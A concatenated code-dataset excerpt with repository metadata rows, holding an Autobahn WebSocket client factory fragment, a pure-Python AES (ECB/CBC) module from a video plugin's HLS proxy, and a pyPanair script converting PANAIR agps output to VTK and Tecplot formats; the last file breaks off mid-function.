The protocol to be spoken. Must be derived from :class:`autobahn.websocket.WebSocketClientProtocol`.
"""
def __init__(self,
## WebSocket session parameters
url = None,
origin = None,
protocols = [],
useragent = "AutobahnPython/%s" % autobahn.version,
## debugging
debug = False,
debugCodePaths = False):
"""
Create instance of WebSocket client factory.
Note that you MUST set URL either here or using setSessionParameters() _before_ the factory is started.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in WebSockets opening handshake or None (default: None).
:type origin: str
:param protocols: List of subprotocols the client should announce in WebSockets opening handshake (default: []).
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header or None (default: "AutobahnWebSockets/x.x.x").
:type useragent: str
:param debug: Debug mode (default: False).
:type debug: bool
:param debugCodePaths: Debug code paths mode (default: False).
:type debugCodePaths: bool
"""
self.debug = debug
self.debugCodePaths = debugCodePaths
self.logOctets = debug
self.logFrames = debug
self.isServer = False
## seed RNG which is used for WS opening handshake key and WS frame masks generation
random.seed()
## default WS session parameters
##
self.setSessionParameters(url, origin, protocols, useragent)
## default WebSocket protocol options
##
self.resetProtocolOptions()
def setSessionParameters(self, url = None, origin = None, protocols = [], useragent = None):
"""
Set WebSocket session parameters.
:param url: WebSocket URL to connect to - ("ws:" | "wss:") "//" host [ ":" port ] path [ "?" query ].
:type url: str
:param origin: The origin to be sent in opening handshake.
:type origin: str
:param protocols: List of WebSocket subprotocols the client should announce in opening handshake.
:type protocols: list of strings
:param useragent: User agent as announced in HTTP request header during opening handshake.
:type useragent: str
"""
if url is not None:
## parse WebSocket URI into components
(isSecure, host, port, resource, path, params) = parseWsUrl(url)
self.url = url
self.isSecure = isSecure
self.host = host
self.port = port
self.resource = resource
self.path = path
self.params = params
else:
self.url = None
self.isSecure = None
self.host = None
self.port = None
self.resource = None
self.path = None
self.params = None
self.origin = origin
self.protocols = protocols
self.useragent = useragent
def resetProtocolOptions(self):
"""
Reset all WebSocket protocol options to defaults.
"""
self.version = WebSocketProtocol.DEFAULT_SPEC_VERSION
self.allowHixie76 = WebSocketProtocol.DEFAULT_ALLOW_HIXIE76
self.utf8validateIncoming = True
self.acceptMaskedServerFrames = False
self.maskClientFrames = True
self.applyMask = True
self.maxFramePayloadSize = 0
self.maxMessagePayloadSize = 0
self.autoFragmentSize = 0
self.failByDrop = True
self.echoCloseCodeReason = False
self.serverConnectionDropTimeout = 1
self.openHandshakeTimeout = 5
self.closeHandshakeTimeout = 1
self.tcpNoDelay = True
def setProtocolOptions(self,
version = None,
allowHixie76 = None,
utf8validateIncoming = None,
acceptMaskedServerFrames = None,
maskClientFrames = None,
applyMask = None,
maxFramePayloadSize = None,
maxMessagePayloadSize = None,
autoFragmentSize = None,
failByDrop = None,
echoCloseCodeReason = None,
serverConnectionDropTimeout = None,
openHandshakeTimeout = None,
closeHandshakeTimeout = None,
tcpNoDelay = None):
"""
Set WebSocket protocol options used as defaults for _new_ protocol instances.
:param version: The WebSockets protocol spec (draft) version to be used (default: WebSocketProtocol.DEFAULT_SPEC_VERSION).
:type version: int
:param allowHixie76: Allow to speak Hixie76 protocol version.
:type allowHixie76: bool
:param utf8validateIncoming: Validate incoming UTF-8 in text message payloads (default: True).
:type utf8validateIncoming: bool
:param acceptMaskedServerFrames: Accept masked server-to-client frames (default: False).
:type acceptMaskedServerFrames: bool
:param maskClientFrames: Mask client-to-server frames (default: True).
:type maskClientFrames: bool
:param applyMask: Actually apply mask to payload when a mask is present. Applies for outgoing and incoming frames (default: True).
:type applyMask: bool
:param maxFramePayloadSize: Maximum frame payload size that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxFramePayloadSize: int
:param maxMessagePayloadSize: Maximum message payload size (after reassembly of fragmented messages) that will be accepted when receiving or 0 for unlimited (default: 0).
:type maxMessagePayloadSize: int
:param autoFragmentSize: Automatic fragmentation of outgoing data messages (when using the message-based API) into frames with payload length <= this size or 0 for no auto-fragmentation (default: 0).
:type autoFragmentSize: int
:param failByDrop: Fail connections by dropping the TCP connection without performing closing handshake (default: True).
:type failByDrop: bool
:param echoCloseCodeReason: Iff true, when receiving a close, echo back close code/reason. Otherwise reply with code == NORMAL, reason = "" (default: False).
:type echoCloseCodeReason: bool
:param serverConnectionDropTimeout: When the client expects the server to drop the TCP, timeout in seconds (default: 1).
:type serverConnectionDropTimeout: float
:param openHandshakeTimeout: Opening WebSocket handshake timeout, timeout in seconds or 0 to deactivate (default: 5).
:type openHandshakeTimeout: float
:param closeHandshakeTimeout: When we expect to receive a closing handshake reply, timeout in seconds (default: 1).
:type closeHandshakeTimeout: float
:param tcpNoDelay: TCP NODELAY ("Nagle") socket option (default: True).
:type tcpNoDelay: bool
"""
if allowHixie76 is not None and allowHixie76 != self.allowHixie76:
self.allowHixie76 = allowHixie76
if version is not None:
if version not in WebSocketProtocol.SUPPORTED_SPEC_VERSIONS:
raise Exception("invalid WebSockets draft version %s (allowed values: %s)" % (version, str(WebSocketProtocol.SUPPORTED_SPEC_VERSIONS)))
if version == 0 and not self.allowHixie76:
raise Exception("use of Hixie-76 requires allowHixie76 == True")
if version != self.version:
self.version = version
if utf8validateIncoming is not None and utf8validateIncoming != self.utf8validateIncoming:
self.utf8validateIncoming = utf8validateIncoming
if acceptMaskedServerFrames is not None and acceptMaskedServerFrames != self.acceptMaskedServerFrames:
self.acceptMaskedServerFrames = acceptMaskedServerFrames
if maskClientFrames is not None and maskClientFrames != self.maskClientFrames:
self.maskClientFrames = maskClientFrames
if applyMask is not None and applyMask != self.applyMask:
self.applyMask = applyMask
if maxFramePayloadSize is not None and maxFramePayloadSize != self.maxFramePayloadSize:
self.maxFramePayloadSize = maxFramePayloadSize
if maxMessagePayloadSize is not None and maxMessagePayloadSize != self.maxMessagePayloadSize:
self.maxMessagePayloadSize = maxMessagePayloadSize
if autoFragmentSize is not None and autoFragmentSize != self.autoFragmentSize:
self.autoFragmentSize = autoFragmentSize
if failByDrop is not None and failByDrop != self.failByDrop:
self.failByDrop = failByDrop
if echoCloseCodeReason is not None and echoCloseCodeReason != self.echoCloseCodeReason:
self.echoCloseCodeReason = echoCloseCodeReason
if serverConnectionDropTimeout is not None and serverConnectionDropTimeout != self.serverConnectionDropTimeout:
self.serverConnectionDropTimeout = serverConnectionDropTimeout
if openHandshakeTimeout is not None and openHandshakeTimeout != self.openHandshakeTimeout:
self.openHandshakeTimeout = openHandshakeTimeout
if closeHandshakeTimeout is not None and closeHandshakeTimeout != self.closeHandshakeTimeout:
self.closeHandshakeTimeout = closeHandshakeTimeout
if tcpNoDelay is not None and tcpNoDelay != self.tcpNoDelay:
self.tcpNoDelay = tcpNoDelay
def clientConnectionFailed(self, connector, reason):
"""
Called by Twisted when the connection to server has failed. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
def clientConnectionLost(self, connector, reason):
"""
Called by Twisted when the connection to server was lost. Default implementation
does nothing. Override in derived class when appropriate.
"""
pass
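# Illustrative sketch (added by the editor, not in the original source): minimal
# client wiring with Twisted. onOpen()/onMessage() are the usual WebSocketProtocol
# callbacks; host and port are placeholders.
#
#   class HelloClientProtocol(WebSocketClientProtocol):
#       def onOpen(self):
#           self.sendMessage("hello from client")
#       def onMessage(self, msg, binary):
#           log.msg("received: %s" % msg)
#
#   factory = WebSocketClientFactory("ws://localhost:9000", debug = False)
#   factory.protocol = HelloClientProtocol
#   reactor.connectTCP("localhost", 9000, factory)
#   reactor.run()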
|
apache-2.0
| 1,140,141,229,421,386,400
| 36.960267
| 212
| 0.603311
| false
| 4.30817
| false
| false
| false
|
bruno-briner/plugin.video.brplay
|
resources/lib/hlsproxy/decrypter.py
|
1
|
16632
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Simple AES cipher implementation in pure Python following PEP-272 API
Based on: https://bitbucket.org/intgr/pyaes/, adapted to be compatible with PEP-8.
The goal of this module is to be as fast as reasonable in Python while still
being Pythonic and readable/understandable. It is licensed under the permissive
MIT license.
Hopefully the code is readable and commented enough that it can serve as an
introduction to the AES cipher for Python coders. In fact, it should go along
well with the Stick Figure Guide to AES:
http://www.moserware.com/2009/09/stick-figure-guide-to-advanced.html
Contrary to intuition, this implementation numbers the 4x4 matrices from top to
bottom for efficiency reasons::
0 4 8 12
1 5 9 13
2 6 10 14
3 7 11 15
Effectively it's the transposition of what you'd expect. This actually makes
the code simpler -- except the ShiftRows step, but hopefully the explanation
there clears it up.
"""
####
# Copyright (c) 2010 Marti Raudsepp <marti@juffo.org>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
####
from array import array
# Globals mandated by PEP 272:
# http://www.python.org/dev/peps/pep-0272/
MODE_ECB = 1
MODE_CBC = 2
#MODE_CTR = 6
block_size = 16
# variable length key: 16, 24 or 32 bytes
key_size = None
class AESDecrypter():
MODE_CBC=2
def new(self, key, mode, IV=None):
if mode == MODE_ECB:
return ECBMode(AES(key))
elif mode == MODE_CBC:
if IV is None:
raise ValueError("CBC mode needs an IV value!")
return CBCMode(AES(key), IV)
else:
raise NotImplementedError
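# Usage sketch (added for illustration; the 16-byte key and IV below are made-up
# values, and the ciphertext must be a multiple of 16 bytes long):
#
#   decrypter = AESDecrypter()
#   cipher = decrypter.new('0123456789abcdef', MODE_CBC, IV='\x00' * 16)
#   plaintext = cipher.decrypt(ciphertext)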
#### AES cipher implementation
class AES(object):
block_size = 16
def __init__(self, key):
self.setkey(key)
def setkey(self, key):
"""Sets the key and performs key expansion."""
self.key = key
self.key_size = len(key)
if self.key_size == 16:
self.rounds = 10
elif self.key_size == 24:
self.rounds = 12
elif self.key_size == 32:
self.rounds = 14
else:
raise ValueError("Key length must be 16, 24 or 32 bytes")
self.expand_key()
def expand_key(self):
"""Performs AES key expansion on self.key and stores in self.exkey"""
# The key schedule specifies how parts of the key are fed into the
# cipher's round functions. "Key expansion" means performing this
# schedule in advance. Almost all implementations do this.
#
# Here's a description of AES key schedule:
# http://en.wikipedia.org/wiki/Rijndael_key_schedule
# The expanded key starts with the actual key itself
exkey = array('B', self.key)
# extra key expansion steps
if self.key_size == 16:
extra_cnt = 0
elif self.key_size == 24:
extra_cnt = 2
else:
extra_cnt = 3
# 4-byte temporary variable for key expansion
word = exkey[-4:]
# Each expansion cycle uses 'i' once for Rcon table lookup
for i in xrange(1, 11):
#### key schedule core:
# left-rotate by 1 byte
word = word[1:4] + word[0:1]
# apply S-box to all bytes
for j in xrange(4):
word[j] = aes_sbox[word[j]]
# apply the Rcon table to the leftmost byte
word[0] ^= aes_Rcon[i]
#### end key schedule core
for z in xrange(4):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
# Last key expansion cycle always finishes here
if len(exkey) >= (self.rounds + 1) * self.block_size:
break
# Special substitution step for 256-bit key
if self.key_size == 32:
for j in xrange(4):
# mix in bytes from the last subkey XORed with S-box of
# current word bytes
word[j] = aes_sbox[word[j]] ^ exkey[-self.key_size + j]
exkey.extend(word)
# Twice for 192-bit key, thrice for 256-bit key
for z in xrange(extra_cnt):
for j in xrange(4):
# mix in bytes from the last subkey
word[j] ^= exkey[-self.key_size + j]
exkey.extend(word)
self.exkey = exkey
def add_round_key(self, block, round):
"""AddRoundKey step. This is where the key is mixed into plaintext"""
offset = round * 16
exkey = self.exkey
for i in xrange(16):
block[i] ^= exkey[offset + i]
#print 'AddRoundKey:', block
def sub_bytes(self, block, sbox):
"""
SubBytes step, apply S-box to all bytes
Depending on whether encrypting or decrypting, a different sbox array
is passed in.
"""
for i in xrange(16):
block[i] = sbox[block[i]]
#print 'SubBytes :', block
def shift_rows(self, b):
"""
ShiftRows step in AES.
Shifts 2nd row to left by 1, 3rd row by 2, 4th row by 3
Since we're performing this on a transposed matrix, cells are numbered
from top to bottom first::
0 4 8 12 -> 0 4 8 12 -- 1st row doesn't change
1 5 9 13 -> 5 9 13 1 -- row shifted to left by 1 (wraps around)
2 6 10 14 -> 10 14 2 6 -- shifted by 2
3 7 11 15 -> 15 3 7 11 -- shifted by 3
"""
b[1], b[5], b[9], b[13] = b[5], b[9], b[13], b[1]
b[2], b[6], b[10], b[14] = b[10], b[14], b[2], b[6]
b[3], b[7], b[11], b[15] = b[15], b[3], b[7], b[11]
#print 'ShiftRows :', b
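        # Worked example (added for illustration): applied to the index block
        # [0, 1, ..., 15], the three swaps above produce
        # [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11].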
def shift_rows_inv(self, b):
"""
Similar to shift_rows above, but performed in inverse for decryption.
"""
b[5], b[9], b[13], b[1] = b[1], b[5], b[9], b[13]
b[10], b[14], b[2], b[6] = b[2], b[6], b[10], b[14]
b[15], b[3], b[7], b[11] = b[3], b[7], b[11], b[15]
#print 'ShiftRows :', b
def mix_columns(self, block):
"""MixColumns step. Mixes the values in each column"""
# Cache global multiplication tables (see below)
mul_by_2 = gf_mul_by_2
mul_by_3 = gf_mul_by_3
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_by_2[v0] ^ v3 ^ v2 ^ mul_by_3[v1]
block[col + 1] = mul_by_2[v1] ^ v0 ^ v3 ^ mul_by_3[v2]
block[col + 2] = mul_by_2[v2] ^ v1 ^ v0 ^ mul_by_3[v3]
block[col + 3] = mul_by_2[v3] ^ v2 ^ v1 ^ mul_by_3[v0]
#print 'MixColumns :', block
def mix_columns_inv(self, block):
"""
Similar to mix_columns above, but performed in inverse for decryption.
"""
# Cache global multiplication tables (see below)
mul_9 = gf_mul_by_9
mul_11 = gf_mul_by_11
mul_13 = gf_mul_by_13
mul_14 = gf_mul_by_14
# Since we're dealing with a transposed matrix, columns are already
# sequential
for col in xrange(0, 16, 4):
v0, v1, v2, v3 = block[col:col + 4]
block[col] = mul_14[v0] ^ mul_9[v3] ^ mul_13[v2] ^ mul_11[v1]
block[col + 1] = mul_14[v1] ^ mul_9[v0] ^ mul_13[v3] ^ mul_11[v2]
block[col + 2] = mul_14[v2] ^ mul_9[v1] ^ mul_13[v0] ^ mul_11[v3]
block[col + 3] = mul_14[v3] ^ mul_9[v2] ^ mul_13[v1] ^ mul_11[v0]
#print 'MixColumns :', block
def encrypt_block(self, block):
"""Encrypts a single block. This is the main AES function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, 0)
for round in xrange(1, self.rounds):
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
self.mix_columns(block)
self.add_round_key(block, round)
self.sub_bytes(block, aes_sbox)
self.shift_rows(block)
# no mix_columns step in the last round
self.add_round_key(block, self.rounds)
def decrypt_block(self, block):
"""Decrypts a single block. This is the main AES decryption function"""
# For efficiency reasons, the state between steps is transmitted via a
# mutable array, not returned
self.add_round_key(block, self.rounds)
# count rounds down from (self.rounds) ... 1
for round in xrange(self.rounds - 1, 0, -1):
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, round)
self.mix_columns_inv(block)
self.shift_rows_inv(block)
self.sub_bytes(block, aes_inv_sbox)
self.add_round_key(block, 0)
# no mix_columns step in the last round
#### ECB mode implementation
class ECBMode(object):
"""Electronic CodeBook (ECB) mode encryption.
Basically this mode applies the cipher function to each block individually;
no feedback is done. NB! This is insecure for almost all purposes
"""
def __init__(self, cipher):
self.cipher = cipher
self.block_size = cipher.block_size
def ecb(self, data, block_func):
"""Perform ECB mode with the given function"""
if len(data) % self.block_size != 0:
raise ValueError("Input length must be multiple of 16")
block_size = self.block_size
data = array('B', data)
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
block_func(block)
data[offset:offset + block_size] = block
return data.tostring()
def encrypt(self, data):
"""Encrypt data in ECB mode"""
return self.ecb(data, self.cipher.encrypt_block)
def decrypt(self, data):
"""Decrypt data in ECB mode"""
return self.ecb(data, self.cipher.decrypt_block)
#### CBC mode
class CBCMode(object):
"""
Cipher Block Chaining(CBC) mode encryption. This mode avoids content leaks.
In CBC encryption, each plaintext block is XORed with the ciphertext block
preceding it; decryption is simply the inverse.
"""
# A better explanation of CBC can be found here:
# http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#-
# Cipher-block_chaining_.28CBC.29
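    #
    # In symbols (a sketch of what encrypt()/decrypt() below implement, with
    # C[-1] standing for the IV):
    #   C[i] = E(P[i] XOR C[i-1])
    #   P[i] = D(C[i]) XOR C[i-1]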
def __init__(self, cipher, IV):
self.cipher = cipher
self.block_size = cipher.block_size
self.IV = array('B', IV)
def encrypt(self, data):
"""Encrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Plaintext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
block = data[offset:offset + block_size]
# Perform CBC chaining
for i in xrange(block_size):
block[i] ^= IV[i]
self.cipher.encrypt_block(block)
data[offset:offset + block_size] = block
IV = block
self.IV = IV
return data.tostring()
def decrypt(self, data):
"""Decrypt data in CBC mode"""
block_size = self.block_size
if len(data) % block_size != 0:
raise ValueError("Ciphertext length must be multiple of 16")
data = array('B', data)
IV = self.IV
for offset in xrange(0, len(data), block_size):
ctext = data[offset:offset + block_size]
block = ctext[:]
self.cipher.decrypt_block(block)
# Perform CBC chaining
#for i in xrange(block_size):
# data[offset + i] ^= IV[i]
for i in xrange(block_size):
block[i] ^= IV[i]
data[offset:offset + block_size] = block
IV = ctext
#data[offset : offset+block_size] = block
self.IV = IV
return data.tostring()
def galois_multiply(a, b):
"""Galois Field multiplicaiton for AES"""
p = 0
while b:
if b & 1:
p ^= a
a <<= 1
if a & 0x100:
a ^= 0x1b
b >>= 1
return p & 0xff
# Precompute the multiplication tables for encryption
gf_mul_by_2 = array('B', [galois_multiply(x, 2) for x in range(256)])
gf_mul_by_3 = array('B', [galois_multiply(x, 3) for x in range(256)])
# ... for decryption
gf_mul_by_9 = array('B', [galois_multiply(x, 9) for x in range(256)])
gf_mul_by_11 = array('B', [galois_multiply(x, 11) for x in range(256)])
gf_mul_by_13 = array('B', [galois_multiply(x, 13) for x in range(256)])
gf_mul_by_14 = array('B', [galois_multiply(x, 14) for x in range(256)])
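# Worked example (added for illustration; the values are the standard GF(2^8)
# multiplication example from FIPS-197):
#   galois_multiply(0x57, 0x83) == 0xc1
#   gf_mul_by_2[0x57] == 0xae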
####
# The S-box is a 256-element array, that maps a single byte value to another
# byte value. Since it's designed to be reversible, each value occurs only once
# in the S-box
#
# More information: http://en.wikipedia.org/wiki/Rijndael_S-box
aes_sbox = array(
'B',
'637c777bf26b6fc53001672bfed7ab76'
'ca82c97dfa5947f0add4a2af9ca472c0'
'b7fd9326363ff7cc34a5e5f171d83115'
'04c723c31896059a071280e2eb27b275'
'09832c1a1b6e5aa0523bd6b329e32f84'
'53d100ed20fcb15b6acbbe394a4c58cf'
'd0efaafb434d338545f9027f503c9fa8'
'51a3408f929d38f5bcb6da2110fff3d2'
'cd0c13ec5f974417c4a77e3d645d1973'
'60814fdc222a908846eeb814de5e0bdb'
'e0323a0a4906245cc2d3ac629195e479'
'e7c8376d8dd54ea96c56f4ea657aae08'
'ba78252e1ca6b4c6e8dd741f4bbd8b8a'
'703eb5664803f60e613557b986c11d9e'
'e1f8981169d98e949b1e87e9ce5528df'
'8ca1890dbfe6426841992d0fb054bb16'.decode('hex')
)
# This is the inverse of the above. In other words:
# aes_inv_sbox[aes_sbox[val]] == val
aes_inv_sbox = array(
'B',
'52096ad53036a538bf40a39e81f3d7fb'
'7ce339829b2fff87348e4344c4dee9cb'
'547b9432a6c2233dee4c950b42fac34e'
'082ea16628d924b2765ba2496d8bd125'
'72f8f66486689816d4a45ccc5d65b692'
'6c704850fdedb9da5e154657a78d9d84'
'90d8ab008cbcd30af7e45805b8b34506'
'd02c1e8fca3f0f02c1afbd0301138a6b'
'3a9111414f67dcea97f2cfcef0b4e673'
'96ac7422e7ad3585e2f937e81c75df6e'
'47f11a711d29c5896fb7620eaa18be1b'
'fc563e4bc6d279209adbc0fe78cd5af4'
'1fdda8338807c731b11210592780ec5f'
'60517fa919b54a0d2de57a9f93c99cef'
'a0e03b4dae2af5b0c8ebbb3c83539961'
'172b047eba77d626e169146355210c7d'.decode('hex')
)
# The Rcon table is used in AES's key schedule (key expansion)
# It's a pre-computed table of exponentation of 2 in AES's finite field
#
# More information: http://en.wikipedia.org/wiki/Rijndael_key_schedule
aes_Rcon = array(
'B',
'8d01020408102040801b366cd8ab4d9a'
'2f5ebc63c697356ad4b37dfaefc59139'
'72e4d3bd61c29f254a943366cc831d3a'
'74e8cb8d01020408102040801b366cd8'
'ab4d9a2f5ebc63c697356ad4b37dfaef'
'c5913972e4d3bd61c29f254a943366cc'
'831d3a74e8cb8d01020408102040801b'
'366cd8ab4d9a2f5ebc63c697356ad4b3'
'7dfaefc5913972e4d3bd61c29f254a94'
'3366cc831d3a74e8cb8d010204081020'
'40801b366cd8ab4d9a2f5ebc63c69735'
'6ad4b37dfaefc5913972e4d3bd61c29f'
'254a943366cc831d3a74e8cb8d010204'
'08102040801b366cd8ab4d9a2f5ebc63'
'c697356ad4b37dfaefc5913972e4d3bd'
'61c29f254a943366cc831d3a74e8cb'.decode('hex')
)
| gpl-3.0 | -5,658,260,328,799,054,000 | 31.6778 | 79 | 0.61045 | false | 3.159574 | false | false | false |
SaTa999/pyPanair | pyPanair/postprocess/agps_converter.py | 1 | 10619 |
#!/usr/bin/env python
import numpy as np
import os
def read_column(file, firstline):
"""read a column from first line (e.g. n01c001) to *eof"""
column = list()
line = firstline
# register methods for faster evaluation
f_readline = file.readline
column_append = column.append
# read each line until *eof
while line:
line = f_readline().split()
if line[0] == "*eof":
break
column_append(line)
return column
def read_network(file, header):
"""read a network"""
network_n = int(header[0][1:3]) # get network number from the first header (e.g. 01 from n01c001)
# print("loading network no.", network_n)
network = list()
line = header
# register methods for faster evaluation
network_append = network.append
# read each line until next header
while line:
col = read_column(file, line)
network_append(col)
line = file.readline().split()
# break at the end of agps file
if not line:
break
# break when reaching the header for the next network (e.g. n02c001)
if not int(line[0][1:3]) == network_n:
break
network = np.array(network, dtype=float)
return network, line
def read_agps(inputfile="agps"):
# read the agps file and return a list of arrays containing data for each network
with open(inputfile, "r") as f:
# skip the header of the agps file
for _ in range(6):
f.readline()
line = f.readline().split()
f.readline() # skip the header of first network ("icol, x, y, z, cp1, cp2, cp3, cp4")
dat = []
while line:
net, line = read_network(f, line)
dat.append(net)
return dat
def write_vtk(n_wake=0, outputname="agps", inputfile="agps"):
"""Write agps in the legacy paraview format (vtk)
    All networks will be merged into one block.
    Therefore, users are advised to omit wake networks by specifying 'n_wake'."""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write the header of the vtk file
vtk = "# vtk DataFile Version 2.0\n"
vtk += "scalar\n"
vtk += "ASCII\n"
vtk += "DATASET UNSTRUCTURED_GRID\n"
n_points = 0 # number of points in vtk file
n_cells = 0 # number of quadrilateral cells formed by the points
n_cp = data[0].shape[2] - 4
points = str() # coordinate of each point (x, y, z)
point_data = [str()] * n_cp # cp at each point (cp1, cp2, cp3, cp4)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
for i in range(len(data) - n_wake):
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
base_square = np.array((0, n_col, n_col + 1, 1))
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add cp data of a point
for l in range(n_cp):
point_data[l] += "{}\n".format(point[4 + l])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k) + n_points
square = (str(p) for p in square)
cells += "4 " + " ".join(square) + "\n"
# add the number of points / cells
n_points += n_row * n_col
n_cells += (n_row - 1) * (n_col - 1)
# write the header of each block (POINTS, CELLS, CELLTYPES, POINT_DATA)
points = "POINTS {} float\n".format(n_points) + points
cells = "CELLS {0} {1}\n".format(n_cells, n_cells * 5) + cells
cell_types = "CELL_TYPES {}\n".format(n_cells) + "9\n" * n_cells
vtk += points + cells + cell_types + "POINT_DATA {}\n".format(n_points)
for l in range(n_cp):
vtk += "SCALARS cp{} float\nLOOKUP_TABLE default\n".format(l + 1) + point_data[l]
with open("{}.vtk".format(outputname), "w") as f:
f.write(vtk)
def write_vtm(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to paraview unstructured grid
each network will become a different vtu file
to open all vtu files at the same time, open the vtm file with paraview"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header of vtm file
vtm = "<?xml version=\"1.0\"?>\n"
vtm += "<VTKFile type=\"vtkMultiBlockDataSet\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtm += " <vtkMultiBlockDataSet>\n"
for i in range(len(data) - n_wake):
# add dataset to vtm file
vtu_dir = "{}_vtu".format(outputname)
try:
os.mkdir(vtu_dir)
except OSError:
if not os.path.exists(vtu_dir):
raise
vtu_path = "{0}/{1}{2}.vtu".format(vtu_dir, outputname, i + 1)
vtm += " <DataSet index=\"network{0}\" file=\"{1}\"/>\n".format(i + 1, vtu_path)
# write header of vtu file
vtu = "<?xml version=\"1.0\"?>\n"
vtu += "<VTKFile type=\"UnstructuredGrid\" version=\"1.0\" byte_order=\"LittleEndian\">\n"
vtu += " <UnstructuredGrid>\n"
# write the header of the piece
net = data[i]
n_cp = net.shape[2] - 4
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i), net.shape)
n_points = n_row * n_col
n_cells = (n_row - 1) * (n_col - 1)
vtu += " <Piece NumberOfPoints=\"{}\" NumberOfCells=\"{}\">\n".format(n_points, n_cells)
# format the agps data
points = str() # coordinate of each point (x, y, z)
cells = str() # ids of each quadrilateral cell (e.g. (0, n_col, n_col + 1, 1) for first cell)
base_square = np.array((0, n_col, n_col + 1, 1), dtype=int)
for j in range(n_row):
for k in range(n_col):
point = net[j, k]
# add coordinate of a point
points += "{0} {1} {2}\n".format(point[1], point[2], point[3])
# add ids of a cell
if not j == n_row - 1 and not k == n_col - 1:
square = base_square + (j * n_col + k)
square = (str(p) for p in square)
cells += " ".join(square) + "\n"
# add formatted agps data to vtu
vtu += " <PointData Scalars=\"scalars\">\n"
# add point_data to vtu
for l in range(n_cp):
vtu += " <DataArray type=\"Float32\" Name=\"cp{}\" format=\"ascii\">\n".format(l + 1)
vtu += " ".join(str(cp) for cp in net[:, :, 4 + l].ravel()) + "\n"
vtu += " </DataArray>\n"
vtu += " </PointData>\n"
# add points to vtu
vtu += " <Points>\n"
vtu += " <DataArray type=\"Float32\" Name=\"network{}\" NumberOfComponents=\"3\" " \
"format=\"ascii\">\n".format(i + 1)
vtu += points
vtu += " </DataArray>\n"
vtu += " </Points>\n"
# add cells to vtu
vtu += " <Cells>\n"
vtu += " <DataArray type=\"Int32\" Name=\"connectivity\" format=\"ascii\">\n"
vtu += cells
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"offsets\" format=\"ascii\">\n"
vtu += " ".join(str(4 * (icell + 1)) for icell in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " <DataArray type=\"Int32\" Name=\"types\" format=\"ascii\">\n"
vtu += " ".join(str(9) for _ in range(n_cells)) + "\n"
vtu += " </DataArray>\n"
vtu += " </Cells>\n"
vtu += " </Piece>\n"
vtu += " </UnstructuredGrid>\n</VTKFile>\n"
with open(vtu_path, "w") as f:
f.write(vtu)
vtm += " </vtkMultiBlockDataSet>\n</VTKFile>"
with open("{}.vtm".format(outputname), "w") as f:
f.write(vtm)
def write_tec(n_wake=0, outputname="agps", inputfile="agps"):
"""convert agps networks to tecplot finite element quadrilaterals"""
data = read_agps(inputfile) # read agps file & specify the number of networks to omit
print("n_wake = ", n_wake)
# write header
n_headers = data[0].shape[2] # number of headers (e.g. 8 for "irow, x, y, z, cp1, cp2, cp3, cp4")
n_cp = n_headers - 4 # number of different cps in agps file
tec = "TITLE = \"AGPS 3D Finite Element Data\"\n"
tec += "VARIABLES = \"x\", \"y\", \"z\""
for i in range(n_cp):
tec += ", \"cp{}\"".format(i + 1)
tec += "\n"
# write each network as a block
for i in range(len(data) - n_wake):
# write the header of the block
net = data[i]
n_row = int(net.shape[0])
n_col = int(net.shape[1])
print("network {} shape: ".format(i + 1), net.shape)
n_points = n_row * n_col
n_elements = (n_row - 1) * (n_col - 1)
tec += "ZONE T=\"MIXED\", N={}, E={}, DATAPACKING=BLOCK," \
" ZONETYPE=FEQUADRILATERAL\n".format(n_points, n_elements)
# write coordinates (x, y, z) and cps (cp1, cp2, cp3, cp4) in each row
for l in range(1, n_headers):
